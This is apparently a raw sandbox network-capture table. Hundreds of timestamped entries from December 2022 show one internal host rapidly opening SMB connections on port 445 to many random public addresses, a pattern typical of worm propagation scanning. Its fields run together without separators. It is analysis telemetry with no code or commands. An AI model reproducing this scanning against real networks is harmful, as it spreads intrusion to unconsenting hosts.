                                                                                            Dec 22, 2022 10:08:12.552983999 CET60550445192.168.2.345.60.37.3
                                                                                            Dec 22, 2022 10:08:12.553045034 CET60550445192.168.2.345.60.37.3
                                                                                            Dec 22, 2022 10:08:12.608352900 CET60654445192.168.2.345.60.37.4
                                                                                            Dec 22, 2022 10:08:12.622951031 CET60543445192.168.2.3201.187.138.2
                                                                                            Dec 22, 2022 10:08:12.684026957 CET60548445192.168.2.3179.127.75.24
                                                                                            Dec 22, 2022 10:08:12.720139980 CET4456055045.60.37.3192.168.2.3
                                                                                            Dec 22, 2022 10:08:12.720191956 CET4456055045.60.37.3192.168.2.3
                                                                                            Dec 22, 2022 10:08:12.772146940 CET4456065445.60.37.4192.168.2.3
                                                                                            Dec 22, 2022 10:08:12.772275925 CET60654445192.168.2.345.60.37.4
                                                                                            Dec 22, 2022 10:08:12.772341013 CET60654445192.168.2.345.60.37.4
                                                                                            Dec 22, 2022 10:08:12.772937059 CET60656445192.168.2.345.60.37.4
                                                                                            Dec 22, 2022 10:08:12.912240028 CET44560548179.127.75.24192.168.2.3
                                                                                            Dec 22, 2022 10:08:12.936069012 CET4456065445.60.37.4192.168.2.3
                                                                                            Dec 22, 2022 10:08:12.937392950 CET60654445192.168.2.345.60.37.4
                                                                                            Dec 22, 2022 10:08:12.938442945 CET4456065645.60.37.4192.168.2.3
                                                                                            Dec 22, 2022 10:08:12.938635111 CET60656445192.168.2.345.60.37.4
                                                                                            Dec 22, 2022 10:08:12.938635111 CET60656445192.168.2.345.60.37.4
                                                                                            Dec 22, 2022 10:08:13.012206078 CET60658445192.168.2.3179.127.75.25
                                                                                            Dec 22, 2022 10:08:13.012336016 CET60659445192.168.2.389.180.247.100
                                                                                            Dec 22, 2022 10:08:13.104625940 CET4456065645.60.37.4192.168.2.3
                                                                                            Dec 22, 2022 10:08:13.104687929 CET4456065645.60.37.4192.168.2.3
                                                                                            Dec 22, 2022 10:08:13.104731083 CET4456065645.60.37.4192.168.2.3
                                                                                            Dec 22, 2022 10:08:13.104830027 CET60656445192.168.2.345.60.37.4
                                                                                            Dec 22, 2022 10:08:13.104914904 CET60656445192.168.2.345.60.37.4
                                                                                            Dec 22, 2022 10:08:13.104914904 CET60656445192.168.2.345.60.37.4
                                                                                            Dec 22, 2022 10:08:13.238193035 CET44560658179.127.75.25192.168.2.3
                                                                                            Dec 22, 2022 10:08:13.371218920 CET59793445192.168.2.345.117.145.3
                                                                                            Dec 22, 2022 10:08:13.421264887 CET60664445192.168.2.389.214.170.242
                                                                                            Dec 22, 2022 10:08:13.423669100 CET60671445192.168.2.31.204.252.156
                                                                                            Dec 22, 2022 10:08:13.425082922 CET60672445192.168.2.347.143.220.150
                                                                                            Dec 22, 2022 10:08:13.425160885 CET60673445192.168.2.3173.25.192.49
                                                                                            Dec 22, 2022 10:08:13.426266909 CET60682445192.168.2.39.186.209.110
                                                                                            Dec 22, 2022 10:08:13.426623106 CET60684445192.168.2.353.112.24.40
                                                                                            Dec 22, 2022 10:08:13.426759005 CET60685445192.168.2.356.61.57.240
                                                                                            Dec 22, 2022 10:08:13.426820040 CET60686445192.168.2.323.242.174.70
                                                                                            Dec 22, 2022 10:08:13.427290916 CET60690445192.168.2.311.11.241.211
                                                                                            Dec 22, 2022 10:08:13.427639961 CET60693445192.168.2.3162.187.85.205
                                                                                            Dec 22, 2022 10:08:13.429001093 CET60707445192.168.2.3105.128.127.106
                                                                                            Dec 22, 2022 10:08:13.429517031 CET60710445192.168.2.383.190.134.14
                                                                                            Dec 22, 2022 10:08:13.429790020 CET60714445192.168.2.3174.155.89.109
                                                                                            Dec 22, 2022 10:08:13.429976940 CET60718445192.168.2.3122.144.51.134
                                                                                            Dec 22, 2022 10:08:13.430283070 CET60725445192.168.2.3132.169.3.39
                                                                                            Dec 22, 2022 10:08:13.430500984 CET60729445192.168.2.3174.204.141.153
                                                                                            Dec 22, 2022 10:08:13.430886030 CET60737445192.168.2.367.26.129.243
                                                                                            Dec 22, 2022 10:08:13.431200981 CET60743445192.168.2.3138.40.56.6
                                                                                            Dec 22, 2022 10:08:13.431425095 CET60749445192.168.2.39.58.118.145
                                                                                            Dec 22, 2022 10:08:13.431596994 CET60753445192.168.2.33.101.51.124
                                                                                            Dec 22, 2022 10:08:13.431694031 CET60754445192.168.2.3106.237.75.240
                                                                                            Dec 22, 2022 10:08:13.432437897 CET60761445192.168.2.3218.33.177.177
                                                                                            Dec 22, 2022 10:08:13.432828903 CET60762445192.168.2.3121.66.221.244
                                                                                            Dec 22, 2022 10:08:13.432883024 CET60763445192.168.2.31.181.113.253
                                                                                            Dec 22, 2022 10:08:13.458919048 CET44560743138.40.56.6192.168.2.3
                                                                                            Dec 22, 2022 10:08:13.458993912 CET60743445192.168.2.3138.40.56.6
                                                                                            Dec 22, 2022 10:08:13.511893034 CET60656445192.168.2.345.60.37.4
                                                                                            Dec 22, 2022 10:08:13.677582026 CET4456065645.60.37.4192.168.2.3
                                                                                            Dec 22, 2022 10:08:13.746238947 CET60658445192.168.2.3179.127.75.25
                                                                                            Dec 22, 2022 10:08:13.918078899 CET59507445192.168.2.3155.100.73.7
                                                                                            Dec 22, 2022 10:08:13.933713913 CET60543445192.168.2.3201.187.138.2
                                                                                            Dec 22, 2022 10:08:13.971980095 CET44560658179.127.75.25192.168.2.3
                                                                                            Dec 22, 2022 10:08:14.090488911 CET60768445192.168.2.389.180.247.101
                                                                                            Dec 22, 2022 10:08:14.090502977 CET60767445192.168.2.3179.127.75.26
                                                                                            Dec 22, 2022 10:08:14.199352026 CET59505445192.168.2.3155.100.73.7
                                                                                            Dec 22, 2022 10:08:14.543705940 CET60773445192.168.2.3136.85.165.107
                                                                                            Dec 22, 2022 10:08:14.543986082 CET60776445192.168.2.3193.36.186.192
                                                                                            Dec 22, 2022 10:08:14.544714928 CET60785445192.168.2.3187.135.214.188
                                                                                            Dec 22, 2022 10:08:14.544811010 CET60786445192.168.2.3202.215.55.206
                                                                                            Dec 22, 2022 10:08:14.545176983 CET60791445192.168.2.3209.243.136.154
                                                                                            Dec 22, 2022 10:08:14.546135902 CET60805445192.168.2.3165.220.60.180
                                                                                            Dec 22, 2022 10:08:14.546230078 CET60806445192.168.2.333.183.53.52
                                                                                            Dec 22, 2022 10:08:14.546638966 CET60812445192.168.2.397.26.229.168
                                                                                            Dec 22, 2022 10:08:14.546730042 CET60813445192.168.2.310.225.148.164
                                                                                            Dec 22, 2022 10:08:14.546804905 CET60814445192.168.2.3156.141.68.74
                                                                                            Dec 22, 2022 10:08:14.547065973 CET60816445192.168.2.3105.13.1.249
                                                                                            Dec 22, 2022 10:08:14.547604084 CET60825445192.168.2.3158.42.41.195
                                                                                            Dec 22, 2022 10:08:14.547688961 CET60826445192.168.2.3160.27.172.6
                                                                                            Dec 22, 2022 10:08:14.547777891 CET60827445192.168.2.3221.90.34.177
                                                                                            Dec 22, 2022 10:08:14.548285007 CET60834445192.168.2.3112.51.72.116
                                                                                            Dec 22, 2022 10:08:14.548629045 CET60835445192.168.2.342.74.140.251
                                                                                            Dec 22, 2022 10:08:14.548755884 CET60836445192.168.2.3148.61.127.231
                                                                                            Dec 22, 2022 10:08:14.548868895 CET60837445192.168.2.381.230.229.193
                                                                                            Dec 22, 2022 10:08:14.549170017 CET60841445192.168.2.374.125.86.83
                                                                                            Dec 22, 2022 10:08:14.549469948 CET60845445192.168.2.3175.28.15.68
                                                                                            Dec 22, 2022 10:08:14.549751043 CET60849445192.168.2.3213.133.193.2
                                                                                            Dec 22, 2022 10:08:14.549983978 CET60852445192.168.2.348.169.78.16
                                                                                            Dec 22, 2022 10:08:14.550587893 CET60860445192.168.2.312.119.191.208
                                                                                            Dec 22, 2022 10:08:14.551153898 CET60868445192.168.2.3194.209.20.91
                                                                                            Dec 22, 2022 10:08:14.595715046 CET44560849213.133.193.2192.168.2.3
                                                                                            Dec 22, 2022 10:08:14.859344006 CET44560786202.215.55.206192.168.2.3
                                                                                            Dec 22, 2022 10:08:14.873416901 CET60875445192.168.2.3155.3.241.3
                                                                                            Dec 22, 2022 10:08:15.002532005 CET44560875155.3.241.3192.168.2.3
                                                                                            Dec 22, 2022 10:08:15.002996922 CET60875445192.168.2.3155.3.241.3
                                                                                            Dec 22, 2022 10:08:15.106210947 CET60849445192.168.2.3213.133.193.2
                                                                                            Dec 22, 2022 10:08:15.152309895 CET44560849213.133.193.2192.168.2.3
                                                                                            Dec 22, 2022 10:08:15.169235945 CET60878445192.168.2.389.180.247.102
                                                                                            Dec 22, 2022 10:08:15.169389963 CET60879445192.168.2.3179.127.75.27
                                                                                            Dec 22, 2022 10:08:15.362286091 CET60786445192.168.2.3202.215.55.206
                                                                                            Dec 22, 2022 10:08:15.402633905 CET60875445192.168.2.3155.3.241.3
                                                                                            Dec 22, 2022 10:08:15.669387102 CET44560786202.215.55.206192.168.2.3
                                                                                            Dec 22, 2022 10:08:15.669461012 CET60884445192.168.2.310.92.219.0
                                                                                            Dec 22, 2022 10:08:15.669536114 CET60885445192.168.2.3116.147.53.178
                                                                                            Dec 22, 2022 10:08:15.670018911 CET60895445192.168.2.336.251.132.141
                                                                                            Dec 22, 2022 10:08:15.670034885 CET60886445192.168.2.3193.136.49.131
                                                                                            Dec 22, 2022 10:08:15.670048952 CET60896445192.168.2.334.175.165.101
                                                                                            Dec 22, 2022 10:08:15.670293093 CET60897445192.168.2.3200.151.120.140
                                                                                            Dec 22, 2022 10:08:15.670299053 CET60903445192.168.2.329.151.134.104
                                                                                            Dec 22, 2022 10:08:15.670469999 CET60905445192.168.2.3145.185.210.230
                                                                                            Dec 22, 2022 10:08:15.670474052 CET60907445192.168.2.350.146.199.246
                                                                                            Dec 22, 2022 10:08:15.670672894 CET60906445192.168.2.3106.22.117.38
                                                                                            Dec 22, 2022 10:08:15.670675993 CET60911445192.168.2.3183.133.36.58
                                                                                            Dec 22, 2022 10:08:15.670952082 CET60915445192.168.2.3105.225.186.166
                                                                                            Dec 22, 2022 10:08:15.670958996 CET60919445192.168.2.358.187.79.53
                                                                                            Dec 22, 2022 10:08:15.671437025 CET60923445192.168.2.367.24.86.81
                                                                                            Dec 22, 2022 10:08:15.671437025 CET60931445192.168.2.359.58.36.51
                                                                                            Dec 22, 2022 10:08:15.672116995 CET60945445192.168.2.316.248.24.121
                                                                                            Dec 22, 2022 10:08:15.672118902 CET60939445192.168.2.3101.126.189.238
                                                                                            Dec 22, 2022 10:08:15.672394037 CET60947445192.168.2.3202.73.47.201
                                                                                            Dec 22, 2022 10:08:15.672524929 CET60953445192.168.2.346.189.163.71
                                                                                            Dec 22, 2022 10:08:15.672735929 CET60956445192.168.2.3204.61.170.113
                                                                                            Dec 22, 2022 10:08:15.672740936 CET60961445192.168.2.356.7.246.119
                                                                                            Dec 22, 2022 10:08:15.673202991 CET60974445192.168.2.3210.239.159.234
                                                                                            Dec 22, 2022 10:08:15.673264980 CET60975445192.168.2.350.226.8.23
                                                                                            Dec 22, 2022 10:08:15.673494101 CET60980445192.168.2.3116.195.133.133
                                                                                            Dec 22, 2022 10:08:15.793288946 CET60875445192.168.2.3155.3.241.3
                                                                                            Dec 22, 2022 10:08:16.106319904 CET60986445192.168.2.345.60.37.4
                                                                                            Dec 22, 2022 10:08:16.231534004 CET60989445192.168.2.389.180.247.103
                                                                                            Dec 22, 2022 10:08:16.232156038 CET60990445192.168.2.3179.127.75.28
                                                                                            Dec 22, 2022 10:08:16.273350954 CET4456098645.60.37.4192.168.2.3
                                                                                            Dec 22, 2022 10:08:16.273641109 CET60986445192.168.2.345.60.37.4
                                                                                            Dec 22, 2022 10:08:16.273710966 CET60986445192.168.2.345.60.37.4
                                                                                            Dec 22, 2022 10:08:16.440702915 CET4456098645.60.37.4192.168.2.3
                                                                                            Dec 22, 2022 10:08:16.440777063 CET4456098645.60.37.4192.168.2.3
                                                                                            Dec 22, 2022 10:08:16.440824032 CET4456098645.60.37.4192.168.2.3
                                                                                            Dec 22, 2022 10:08:16.441200972 CET60986445192.168.2.345.60.37.4
                                                                                            Dec 22, 2022 10:08:16.441317081 CET60986445192.168.2.345.60.37.4
                                                                                            Dec 22, 2022 10:08:16.441317081 CET60986445192.168.2.345.60.37.4
                                                                                            Dec 22, 2022 10:08:16.498975039 CET60992445192.168.2.345.60.37.5
                                                                                            Dec 22, 2022 10:08:16.543391943 CET60543445192.168.2.3201.187.138.2
                                                                                            Dec 22, 2022 10:08:16.575051069 CET60875445192.168.2.3155.3.241.3
                                                                                            Dec 22, 2022 10:08:16.608244896 CET4456098645.60.37.4192.168.2.3
                                                                                            Dec 22, 2022 10:08:16.665303946 CET4456099245.60.37.5192.168.2.3
                                                                                            Dec 22, 2022 10:08:16.665538073 CET60992445192.168.2.345.60.37.5
                                                                                            Dec 22, 2022 10:08:16.665539026 CET60992445192.168.2.345.60.37.5
                                                                                            Dec 22, 2022 10:08:16.666388035 CET60994445192.168.2.345.60.37.5
                                                                                            Dec 22, 2022 10:08:16.780145884 CET60999445192.168.2.366.239.247.137
                                                                                            Dec 22, 2022 10:08:16.780169964 CET61009445192.168.2.3115.148.38.238
                                                                                            Dec 22, 2022 10:08:16.780267000 CET61010445192.168.2.3135.189.233.20
                                                                                            Dec 22, 2022 10:08:16.780457020 CET61016445192.168.2.3193.142.175.150
                                                                                            Dec 22, 2022 10:08:16.780713081 CET61022445192.168.2.3138.232.199.218
                                                                                            Dec 22, 2022 10:08:16.781150103 CET61033445192.168.2.385.179.146.112
                                                                                            Dec 22, 2022 10:08:16.781265020 CET61035445192.168.2.319.24.120.86
                                                                                            Dec 22, 2022 10:08:16.781356096 CET61036445192.168.2.31.90.181.132
                                                                                            Dec 22, 2022 10:08:16.781356096 CET61038445192.168.2.391.207.123.233
                                                                                            Dec 22, 2022 10:08:16.781434059 CET61024445192.168.2.3100.109.215.155
                                                                                            Dec 22, 2022 10:08:16.781434059 CET61029445192.168.2.3169.87.25.235
                                                                                            Dec 22, 2022 10:08:16.781613111 CET61044445192.168.2.363.251.71.231
                                                                                            Dec 22, 2022 10:08:16.781632900 CET61045445192.168.2.3204.41.183.175
                                                                                            Dec 22, 2022 10:08:16.781786919 CET61046445192.168.2.3220.164.115.155
                                                                                            Dec 22, 2022 10:08:16.782084942 CET61056445192.168.2.3140.160.250.83
                                                                                            Dec 22, 2022 10:08:16.782116890 CET61054445192.168.2.3115.215.187.71
                                                                                            Dec 22, 2022 10:08:16.782116890 CET61057445192.168.2.362.26.56.149
                                                                                            Dec 22, 2022 10:08:16.782715082 CET61059445192.168.2.329.245.55.239
                                                                                            Dec 22, 2022 10:08:16.782716036 CET61068445192.168.2.385.251.144.252
                                                                                            Dec 22, 2022 10:08:16.782968044 CET61077445192.168.2.3111.93.142.31
                                                                                            Dec 22, 2022 10:08:16.783109903 CET61082445192.168.2.3117.49.146.158
                                                                                            Dec 22, 2022 10:08:16.783235073 CET61085445192.168.2.3132.219.112.1
                                                                                            Dec 22, 2022 10:08:16.783400059 CET61089445192.168.2.333.126.33.124
                                                                                            Dec 22, 2022 10:08:16.783880949 CET61096445192.168.2.3203.135.129.60
                                                                                            Dec 22, 2022 10:08:16.810535908 CET44561022138.232.199.218192.168.2.3
                                                                                            Dec 22, 2022 10:08:16.829983950 CET4456099445.60.37.5192.168.2.3
                                                                                            Dec 22, 2022 10:08:16.830127954 CET60994445192.168.2.345.60.37.5
                                                                                            Dec 22, 2022 10:08:16.830128908 CET60994445192.168.2.345.60.37.5
                                                                                            Dec 22, 2022 10:08:16.831531048 CET4456099245.60.37.5192.168.2.3
                                                                                            Dec 22, 2022 10:08:16.831691027 CET60992445192.168.2.345.60.37.5
                                                                                            Dec 22, 2022 10:08:16.871459961 CET60986445192.168.2.345.60.37.4
                                                                                            Dec 22, 2022 10:08:16.934442997 CET61098445192.168.2.3155.100.73.7
                                                                                            Dec 22, 2022 10:08:16.993860006 CET4456099445.60.37.5192.168.2.3
                                                                                            Dec 22, 2022 10:08:16.993892908 CET4456099445.60.37.5192.168.2.3
                                                                                            Dec 22, 2022 10:08:16.993910074 CET4456099445.60.37.5192.168.2.3
                                                                                            Dec 22, 2022 10:08:16.994029999 CET60994445192.168.2.345.60.37.5
                                                                                            Dec 22, 2022 10:08:16.994086981 CET60994445192.168.2.345.60.37.5
                                                                                            Dec 22, 2022 10:08:16.994086981 CET60994445192.168.2.345.60.37.5
                                                                                            Dec 22, 2022 10:08:17.038463116 CET4456098645.60.37.4192.168.2.3
                                                                                            Dec 22, 2022 10:08:17.083710909 CET44561098155.100.73.7192.168.2.3
                                                                                            Dec 22, 2022 10:08:17.083815098 CET61098445192.168.2.3155.100.73.7
                                                                                            Dec 22, 2022 10:08:17.157578945 CET4456099445.60.37.5192.168.2.3
                                                                                            Dec 22, 2022 10:08:17.309695959 CET61103445192.168.2.3179.127.75.29
                                                                                            Dec 22, 2022 10:08:17.309894085 CET61104445192.168.2.389.180.247.104
                                                                                            Dec 22, 2022 10:08:17.324645996 CET61022445192.168.2.3138.232.199.218
                                                                                            Dec 22, 2022 10:08:17.527782917 CET61098445192.168.2.3155.100.73.7
                                                                                            Dec 22, 2022 10:08:17.902905941 CET59902445192.168.2.350.116.150.4
                                                                                            Dec 22, 2022 10:08:17.904441118 CET61110445192.168.2.3169.4.104.203
                                                                                            Dec 22, 2022 10:08:17.904789925 CET61116445192.168.2.3128.250.174.108
                                                                                            Dec 22, 2022 10:08:17.904799938 CET61115445192.168.2.3185.20.212.144
                                                                                            Dec 22, 2022 10:08:17.905440092 CET61117445192.168.2.3194.243.250.135
                                                                                            Dec 22, 2022 10:08:17.905440092 CET61126445192.168.2.356.2.103.140
                                                                                            Dec 22, 2022 10:08:17.905678988 CET61127445192.168.2.370.68.29.113
                                                                                            Dec 22, 2022 10:08:17.905682087 CET61128445192.168.2.32.115.39.201
                                                                                            Dec 22, 2022 10:08:17.906291008 CET61130445192.168.2.3108.186.170.190
                                                                                            Dec 22, 2022 10:08:17.906295061 CET61139445192.168.2.358.61.16.97
                                                                                            Dec 22, 2022 10:08:17.906871080 CET61153445192.168.2.3128.201.254.162
                                                                                            Dec 22, 2022 10:08:17.906913996 CET61149445192.168.2.3132.52.36.122
                                                                                            Dec 22, 2022 10:08:17.907160997 CET61157445192.168.2.3170.32.126.157
                                                                                            Dec 22, 2022 10:08:17.907170057 CET61161445192.168.2.369.222.29.244
                                                                                            Dec 22, 2022 10:08:17.907586098 CET61166445192.168.2.386.68.254.152
                                                                                            Dec 22, 2022 10:08:17.907593966 CET61170445192.168.2.3170.53.218.96
                                                                                            Dec 22, 2022 10:08:17.908015966 CET61182445192.168.2.3214.32.112.17
                                                                                            Dec 22, 2022 10:08:17.908031940 CET61180445192.168.2.378.140.18.161
                                                                                            Dec 22, 2022 10:08:17.908502102 CET61187445192.168.2.385.194.249.124
                                                                                            Dec 22, 2022 10:08:17.908502102 CET61194445192.168.2.3112.230.161.240
                                                                                            Dec 22, 2022 10:08:17.908725023 CET61196445192.168.2.394.104.71.247
                                                                                            Dec 22, 2022 10:08:17.908735037 CET61200445192.168.2.322.191.167.229
                                                                                            Dec 22, 2022 10:08:17.909003973 CET61207445192.168.2.341.143.2.84
                                                                                            Dec 22, 2022 10:08:17.909013033 CET61206445192.168.2.381.29.154.157
                                                                                            Dec 22, 2022 10:08:17.909832954 CET61204445192.168.2.3106.75.191.105
                                                                                            Dec 22, 2022 10:08:17.949830055 CET61098445192.168.2.3155.100.73.7
                                                                                            Dec 22, 2022 10:08:18.014076948 CET60007445192.168.2.350.116.150.4
                                                                                            Dec 22, 2022 10:08:18.079421997 CET44561130108.186.170.190192.168.2.3
                                                                                            Dec 22, 2022 10:08:18.122231007 CET60875445192.168.2.3155.3.241.3
                                                                                            Dec 22, 2022 10:08:18.372549057 CET61213445192.168.2.3179.127.75.30
                                                                                            Dec 22, 2022 10:08:18.372551918 CET61212445192.168.2.389.180.247.105
                                                                                            Dec 22, 2022 10:08:18.590725899 CET61130445192.168.2.3108.186.170.190
                                                                                            Dec 22, 2022 10:08:18.762553930 CET44561130108.186.170.190192.168.2.3
                                                                                            Dec 22, 2022 10:08:18.840382099 CET61098445192.168.2.3155.100.73.7
                                                                                            Dec 22, 2022 10:08:19.013705969 CET61228445192.168.2.327.199.208.105
                                                                                            Dec 22, 2022 10:08:19.013802052 CET61230445192.168.2.331.55.128.97
                                                                                            Dec 22, 2022 10:08:19.014025927 CET61234445192.168.2.3128.181.0.165
                                                                                            Dec 22, 2022 10:08:19.014481068 CET61244445192.168.2.3103.102.83.191
                                                                                            Dec 22, 2022 10:08:19.014723063 CET61245445192.168.2.383.169.151.110
                                                                                            Dec 22, 2022 10:08:19.014728069 CET61250445192.168.2.362.105.153.85
                                                                                            Dec 22, 2022 10:08:19.014817953 CET61252445192.168.2.3146.56.139.43
                                                                                            Dec 22, 2022 10:08:19.015136957 CET61258445192.168.2.353.64.64.223
                                                                                            Dec 22, 2022 10:08:19.015249968 CET61261445192.168.2.365.201.31.159
                                                                                            Dec 22, 2022 10:08:19.015347958 CET61253445192.168.2.3216.92.23.6
                                                                                            Dec 22, 2022 10:08:19.015347958 CET61262445192.168.2.3119.52.59.21
                                                                                            Dec 22, 2022 10:08:19.015398026 CET61263445192.168.2.3157.200.172.224
                                                                                            Dec 22, 2022 10:08:19.015886068 CET61273445192.168.2.341.52.52.229
                                                                                            Dec 22, 2022 10:08:19.015889883 CET61274445192.168.2.3115.137.25.104
                                                                                            Dec 22, 2022 10:08:19.016117096 CET61279445192.168.2.341.122.248.34
                                                                                            Dec 22, 2022 10:08:19.016319036 CET61283445192.168.2.382.115.155.84
                                                                                            Dec 22, 2022 10:08:19.016442060 CET61271445192.168.2.3150.95.132.43
                                                                                            Dec 22, 2022 10:08:19.016947985 CET61288445192.168.2.3161.251.38.93
                                                                                            Dec 22, 2022 10:08:19.016947985 CET61296445192.168.2.3116.233.148.230
                                                                                            Dec 22, 2022 10:08:19.017304897 CET61304445192.168.2.35.211.36.124
                                                                                            Dec 22, 2022 10:08:19.017366886 CET61306445192.168.2.3206.19.151.42
                                                                                            Dec 22, 2022 10:08:19.017502069 CET61309445192.168.2.3157.149.94.135
                                                                                            Dec 22, 2022 10:08:19.017649889 CET61313445192.168.2.3140.139.210.12
                                                                                            Dec 22, 2022 10:08:19.017930984 CET61319445192.168.2.3217.91.93.103
                                                                                            Dec 22, 2022 10:08:19.435069084 CET61324445192.168.2.389.180.247.106
                                                                                            Dec 22, 2022 10:08:19.435132027 CET61325445192.168.2.3179.127.75.31
                                                                                            Dec 22, 2022 10:08:20.142920017 CET61330445192.168.2.345.60.37.5
                                                                                            Dec 22, 2022 10:08:20.249275923 CET61340445192.168.2.355.164.143.251
                                                                                            Dec 22, 2022 10:08:20.249893904 CET61348445192.168.2.3153.2.188.161
                                                                                            Dec 22, 2022 10:08:20.250227928 CET61349445192.168.2.3153.213.225.17
                                                                                            Dec 22, 2022 10:08:20.250293016 CET61352445192.168.2.3206.184.177.247
                                                                                            Dec 22, 2022 10:08:20.250586033 CET61356445192.168.2.3218.13.77.183
                                                                                            Dec 22, 2022 10:08:20.251075029 CET61362445192.168.2.329.139.231.38
                                                                                            Dec 22, 2022 10:08:20.251257896 CET61365445192.168.2.3207.152.237.182
                                                                                            Dec 22, 2022 10:08:20.251341105 CET61366445192.168.2.3206.185.35.115
                                                                                            Dec 22, 2022 10:08:20.251509905 CET61367445192.168.2.349.163.246.106
                                                                                            Dec 22, 2022 10:08:20.251841068 CET61372445192.168.2.3126.189.133.245
                                                                                            Dec 22, 2022 10:08:20.252183914 CET61376445192.168.2.3120.13.215.38
                                                                                            Dec 22, 2022 10:08:20.252650023 CET61382445192.168.2.3217.209.200.188
                                                                                            Dec 22, 2022 10:08:20.253459930 CET61393445192.168.2.3153.10.36.124
                                                                                            Dec 22, 2022 10:08:20.253598928 CET61395445192.168.2.333.57.63.144
                                                                                            Dec 22, 2022 10:08:20.253923893 CET61399445192.168.2.3169.76.129.163
                                                                                            Dec 22, 2022 10:08:20.254628897 CET61409445192.168.2.344.137.228.166
                                                                                            Dec 22, 2022 10:08:20.254705906 CET61410445192.168.2.312.37.92.183
                                                                                            Dec 22, 2022 10:08:20.255073071 CET61415445192.168.2.337.65.170.235
                                                                                            Dec 22, 2022 10:08:20.255259037 CET61417445192.168.2.3176.215.146.178
                                                                                            Dec 22, 2022 10:08:20.255422115 CET61419445192.168.2.3155.101.201.135
                                                                                            Dec 22, 2022 10:08:20.255773067 CET61424445192.168.2.3160.161.3.234
                                                                                            Dec 22, 2022 10:08:20.255940914 CET61426445192.168.2.3148.130.142.49
                                                                                            Dec 22, 2022 10:08:20.256052017 CET61427445192.168.2.3194.38.142.4
                                                                                            Dec 22, 2022 10:08:20.256197929 CET61428445192.168.2.35.197.183.43
                                                                                            Dec 22, 2022 10:08:20.307256937 CET4456133045.60.37.5192.168.2.3
                                                                                            Dec 22, 2022 10:08:20.309418917 CET61330445192.168.2.345.60.37.5
                                                                                            Dec 22, 2022 10:08:20.309860945 CET61330445192.168.2.345.60.37.5
                                                                                            Dec 22, 2022 10:08:20.402960062 CET44561419155.101.201.135192.168.2.3
                                                                                            Dec 22, 2022 10:08:20.406641960 CET61419445192.168.2.3155.101.201.135
                                                                                            Dec 22, 2022 10:08:20.406883001 CET61435445192.168.2.3155.101.201.1
                                                                                            Dec 22, 2022 10:08:20.473788023 CET4456133045.60.37.5192.168.2.3
                                                                                            Dec 22, 2022 10:08:20.473855019 CET4456133045.60.37.5192.168.2.3
                                                                                            Dec 22, 2022 10:08:20.473925114 CET4456133045.60.37.5192.168.2.3
                                                                                            Dec 22, 2022 10:08:20.474102974 CET61330445192.168.2.345.60.37.5
                                                                                            Dec 22, 2022 10:08:20.478557110 CET61330445192.168.2.345.60.37.5
                                                                                            Dec 22, 2022 10:08:20.512814999 CET61438445192.168.2.389.180.247.107
                                                                                            Dec 22, 2022 10:08:20.512903929 CET61439445192.168.2.3179.127.75.32
                                                                                            Dec 22, 2022 10:08:20.544445992 CET61440445192.168.2.345.60.37.6
                                                                                            Dec 22, 2022 10:08:20.556148052 CET44561435155.101.201.1192.168.2.3
                                                                                            Dec 22, 2022 10:08:20.556864023 CET61435445192.168.2.3155.101.201.1
                                                                                            Dec 22, 2022 10:08:20.575860023 CET61441445192.168.2.3155.101.201.1
                                                                                            Dec 22, 2022 10:08:20.606180906 CET61098445192.168.2.3155.100.73.7
                                                                                            Dec 22, 2022 10:08:20.638156891 CET4456133045.60.37.5192.168.2.3
                                                                                            Dec 22, 2022 10:08:20.642573118 CET4456133045.60.37.5192.168.2.3
                                                                                            Dec 22, 2022 10:08:20.710573912 CET4456144045.60.37.6192.168.2.3
                                                                                            Dec 22, 2022 10:08:20.712680101 CET61440445192.168.2.345.60.37.6
                                                                                            Dec 22, 2022 10:08:20.712749958 CET61440445192.168.2.345.60.37.6
                                                                                            Dec 22, 2022 10:08:20.725487947 CET44561441155.101.201.1192.168.2.3
                                                                                            Dec 22, 2022 10:08:20.730115891 CET61441445192.168.2.3155.101.201.1
                                                                                            Dec 22, 2022 10:08:20.731601954 CET61444445192.168.2.345.60.37.6
                                                                                            Dec 22, 2022 10:08:20.871891022 CET61419445192.168.2.3155.101.201.135
                                                                                            Dec 22, 2022 10:08:20.878899097 CET4456144045.60.37.6192.168.2.3
                                                                                            Dec 22, 2022 10:08:20.879090071 CET61440445192.168.2.345.60.37.6
                                                                                            Dec 22, 2022 10:08:20.895168066 CET4456144445.60.37.6192.168.2.3
                                                                                            Dec 22, 2022 10:08:20.895417929 CET61444445192.168.2.345.60.37.6
                                                                                            Dec 22, 2022 10:08:21.012533903 CET61435445192.168.2.3155.101.201.1
                                                                                            Dec 22, 2022 10:08:21.184393883 CET61441445192.168.2.3155.101.201.1
                                                                                            Dec 22, 2022 10:08:21.215667963 CET60875445192.168.2.3155.3.241.3
                                                                                            Dec 22, 2022 10:08:21.281970024 CET61444445192.168.2.345.60.37.6
                                                                                            Dec 22, 2022 10:08:21.288563013 CET61446445192.168.2.350.116.150.4
                                                                                            Dec 22, 2022 10:08:21.309396029 CET61419445192.168.2.3155.101.201.135
                                                                                            Dec 22, 2022 10:08:21.388300896 CET61452445192.168.2.3163.211.186.155
                                                                                            Dec 22, 2022 10:08:21.388411045 CET61453445192.168.2.3186.181.241.168
                                                                                            Dec 22, 2022 10:08:21.388814926 CET61458445192.168.2.3155.19.210.154
                                                                                            Dec 22, 2022 10:08:21.388967991 CET61460445192.168.2.3190.246.58.25
                                                                                            Dec 22, 2022 10:08:21.389406919 CET61466445192.168.2.3131.111.74.84
                                                                                            Dec 22, 2022 10:08:21.389559984 CET61468445192.168.2.364.185.29.197
                                                                                            Dec 22, 2022 10:08:21.389647007 CET61469445192.168.2.3121.136.134.250
                                                                                            Dec 22, 2022 10:08:21.389776945 CET61470445192.168.2.3149.3.21.14
                                                                                            Dec 22, 2022 10:08:21.390599966 CET61483445192.168.2.345.171.224.210
                                                                                            Dec 22, 2022 10:08:21.390702963 CET61484445192.168.2.399.13.119.83
                                                                                            Dec 22, 2022 10:08:21.390949965 CET61487445192.168.2.342.76.203.30
                                                                                            Dec 22, 2022 10:08:21.391649008 CET61497445192.168.2.346.250.86.107
                                                                                            Dec 22, 2022 10:08:21.391773939 CET61491445192.168.2.379.170.194.23
                                                                                            Dec 22, 2022 10:08:21.391901970 CET61500445192.168.2.3140.151.52.246
                                                                                            Dec 22, 2022 10:08:21.392004967 CET61501445192.168.2.378.44.31.200
                                                                                            Dec 22, 2022 10:08:21.392097950 CET61502445192.168.2.3124.155.31.180
                                                                                            Dec 22, 2022 10:08:21.392499924 CET61507445192.168.2.365.250.5.38
                                                                                            Dec 22, 2022 10:08:21.392798901 CET61511445192.168.2.374.182.17.236
